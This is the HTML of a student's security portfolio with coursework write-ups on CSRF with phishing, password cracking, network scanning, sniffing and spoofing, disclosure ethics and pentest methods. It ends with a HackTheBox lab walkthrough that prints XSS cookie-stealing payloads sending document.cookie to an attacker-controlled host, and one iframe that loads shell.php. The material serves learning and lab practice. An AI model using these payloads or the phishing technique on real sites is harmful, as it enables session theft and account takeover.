          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
